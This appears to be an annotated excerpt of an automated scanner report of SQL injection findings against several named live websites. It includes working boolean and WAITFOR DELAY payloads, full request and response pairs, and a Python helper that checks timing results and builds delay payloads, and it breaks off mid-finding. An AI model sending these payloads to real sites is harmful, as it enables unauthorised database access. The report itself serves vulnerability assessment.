Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:56 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:57 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that neither Apache nor PHP URL-decodes the Referer header ($_SERVER['HTTP_REFERER'] is the raw value), so for %2527 to reach a query as a bare quote the application would have to decode it twice; and, as with the cookie finding above, the excerpts show no database error text and the two 200 OK responses differ in length by only 39 bytes. Treat as unconfirmed.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The Referer header is not URL-decoded by the web server or by PHP, so if the application decodes it at all it should do so exactly once, and there is no reason to perform a second URL-decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, never before it.
Request 1
GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:08 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:08 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:09 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27853
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]... </div>Get more with the 2011 Venza from Toyota, a 6-speed electronically-controlled automatic transmission crossover SUV that packs quite the punch. The Venza's performance is enhanced with exceptional ventilated front brakes and rear solid brakes while the electric power steering option eases your control over the steering wheel. <br /> ...[SNIP]...
Request 2
GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:11 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:11 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19672140'%20or%201%3d1--%20 and 19672140'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the difference is semantically meaningful rather than cosmetic: with ' or 1=1-- the page title reads "New Toyota Vehicles - Sterling McCall Hyundai Houston", a dealership other than the one whose confid_ value was supplied, whereas with ' or 1=2-- the title is "New Toyota Vehicles - " with no dealer name at all. That is consistent with the confid_ value being used, unescaped, in a dealer-configuration lookup on a platform shared by several dealerships, so this should be treated as a likely true positive with cross-tenant impact.
Request 1
GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d1--%20/make_Toyota/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:08:29 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:08:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 33550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyota Vehicles - Sterling McCall Hyundai Houston</TITLE> <META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 
2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyot ...[SNIP]...
Request 2
GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d2--%20/make_Toyota/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:08:36 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:08:37 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 30222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyota Vehicles - </TITLE> <META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 
Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacom ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 66165 milliseconds to respond to the request, compared with 45707 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The excess of about 20.5 seconds matches the requested delay, but the baseline request itself took over 45 seconds, so the host was already slow or under load while being scanned. Confirm by re-submitting with different delay values (for example 0:0:5 and 0:0:10) and checking that the response time tracks the requested delay.
The database appears to be Microsoft SQL Server (WAITFOR DELAY is Transact-SQL syntax). Note that the front end is Apache/PHP on Ubuntu, so the SQL Server instance would be a separate back-end host.
Request
GET /inventory.php?&VehicleType=New HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792'waitfor%20delay'0%3a0%3a20'--; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:43:48 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 82433
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 34865 milliseconds to respond to the request, compared with 394 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The delayed response is a 404, which suggests that the requested path is written to the database (for example, into a missing-page log) before the error page is rendered. The excess of about 34.5 seconds is larger than the 20 seconds requested, so re-test with other delay values to check that the latency tracks the delay.
The database appears to be Microsoft SQL Server (WAITFOR DELAY is Transact-SQL syntax).
Request
GET /quick-quote.html',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 04:22:13 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47946
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie. The application took 85392 milliseconds to respond to the request, compared with 28373 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The excess here is about 57 seconds, almost three times the 20 seconds requested: either the cookie value is used in more than one statement, or the timing is dominated by load on an already slow host (the baseline itself took 28 seconds). Re-test with several delay values before relying on this result.
The database appears to be Microsoft SQL Server (WAITFOR DELAY is Transact-SQL syntax).
Request
GET /search/CPO+t HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:06:07 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 92151
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Certified Pre-Owned Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serv ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 51229 milliseconds to respond to the request, compared with 23804 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The excess of about 27.4 seconds is in the right region for a 20 second delay on a host whose baseline is already 24 seconds, but, as with the other cookie findings on this host, it should be confirmed with several different delay values. Note that this payload contains no quote: it closes a numeric argument list, which indicates the cookie value is used unquoted in a numeric context.
The database appears to be Microsoft SQL Server (WAITFOR DELAY is Transact-SQL syntax).
Request
GET /search/New+Toyota+tm HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792,0,0,0)waitfor%20delay'0%3a0%3a20'--; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:52:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 82699
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - S ...[SNIP]...
The Source parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the Source parameter. The application took 20353 milliseconds to respond to the request, compared with 263 milliseconds for the original request, indicating that the injected SQL command caused a time delay. Here the excess (about 20.1 seconds against a 0.26 second baseline) matches the requested delay almost exactly, which is strong evidence. The endpoint is a classic ASP page (obitrss.asp on IIS 6.0) returning XML, so an error-free 200 response is what a blind injection would be expected to produce.
The database appears to be Microsoft SQL Server (WAITFOR DELAY is Transact-SQL syntax).
Request
GET /services/obitrss.asp?Source=MercuryNews'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.legacy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 06:02:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Type: text/xml
Set-Cookie: ASPSESSIONIDCSSDBCCC=BDEJAEIDNCFFJDLHCNDJDOAD; path=/
Cache-control: private
Content-Length: 422
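Because three of the four fremonttoyota.com timing findings above have baselines of 24 to 46 seconds, a single "slower than the original request" comparison is not enough to confirm them, whereas the legacy.com result (20.1 seconds against 0.26) speaks for itself. The following Python is an added example, not part of the Burp report or of any of the scanned sites: it takes timing samples for several requested delays (the sample figures are constructed for the example) and accepts the injection only when the excess over the baseline tracks the requested delay at every value. The payload helper reproduces the report's WAITFOR DELAY shape for other delay lengths; sending the requests is left to whatever HTTP client you use.

```python
import statistics

# Constructed measurements in seconds: (requested WAITFOR DELAY, observed response time).
# Invented for this example, not figures from the report, but with a deliberately
# slow and noisy baseline (tens of seconds) to mirror the fremonttoyota.com cookie findings.
SAMPLES_CONFIRMED = [
    (0, 45.7), (0, 44.9), (0, 46.3),
    (5, 50.8), (5, 51.1),
    (10, 56.0), (10, 55.4),
    (20, 66.2), (20, 65.7),
]
# A host that is merely overloaded: response time does not follow the requested delay.
SAMPLES_NOISY = [
    (0, 45.7), (0, 44.9), (0, 46.3),
    (5, 61.0), (5, 58.2),
    (10, 44.0), (10, 47.1),
    (20, 66.2), (20, 29.5),
]


def mssql_delay_payload(template: str, seconds: int) -> str:
    """Fill the report's payload shape with a different delay, e.g. 0:0:5.

    `template` must contain '{hms}' where the T-SQL time literal goes; the rest
    (quote/parenthesis prefix and trailing comment) is copied from the finding
    being re-tested. URL-encode the result before placing it in a cookie or URL.
    """
    return template.format(hms=f"0:0:{seconds}")


def delay_confirmed(samples, tolerance: float = 0.35) -> bool:
    """True when the extra latency tracks the requested delay at every delay value.

    A single 'slower than baseline' comparison is weak evidence when the baseline
    itself is tens of seconds. Requiring the median excess over the baseline to be
    within `tolerance` (as a fraction) of the requested delay, for several different
    delays, separates a real WAITFOR from a host that is just slow.
    """
    by_delay = {}
    for delay, observed in samples:
        by_delay.setdefault(delay, []).append(observed)
    if 0 not in by_delay or len(by_delay) < 3:
        raise ValueError("need a zero-delay baseline and at least two non-zero delays")
    baseline = statistics.median(by_delay[0])
    for delay, observations in by_delay.items():
        if delay == 0:
            continue
        excess = statistics.median(observations) - baseline
        if abs(excess - delay) > tolerance * delay:
            return False
    return True


if __name__ == "__main__":
    print("constructed 'confirmed' series:", delay_confirmed(SAMPLES_CONFIRMED))
    print("constructed 'noisy' series:    ", delay_confirmed(SAMPLES_NOISY))
    # The __utmc finding's payload, decoded, with a 5 second delay instead of 20.
    print(mssql_delay_payload("'waitfor delay'{hms}'--", 5))
```

The tolerance is deliberately loose (35 percent) because each request to a slow host carries seconds of jitter; what matters is that the excess grows with the requested delay across three or more values, which no amount of background load will reproduce.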
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In this case the error message is the 21-byte body "Update referer failed", which replaces the entire page: the site evidently records each visitor's Referer in its database on every request and aborts rendering when that write fails. One quote breaks the statement and two quotes (the SQL escape for a literal quote) do not, which is the classic signature of an unescaped string literal and a strong indicator, although it still warrants manual confirmation.
Request 1
GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rpqctedmaoqs1lp8qp6m2t1237; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 21
Connection: close
Content-Type: text/html
Update referer failed
Request 2
GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=129vt2sagrtpoiqhi4qnliurm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the Referer finding on this host, the error message is a bare 24-byte body ("Update user agent failed") in place of the page, so the User-Agent value is being written to the database on every request through the same unescaped pattern.
Request 1
GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Response 1
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=23jlt2alhsimpjdb83thqj1bk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html
Update user agent failed
Request 2
GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Response 2
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l5hsujb84ieisgntdm6051n617; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
1.167. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.linkatopia.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The error body here is "Update page count failed", and it is triggered by the parameter name rather than a value, which suggests the full request URL including its query string is stored as part of a per-page hit counter. Together with the Referer and User-Agent findings on this host, three separate per-request database writes share the same unescaped string-building pattern.
Request 1
GET /?1'=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
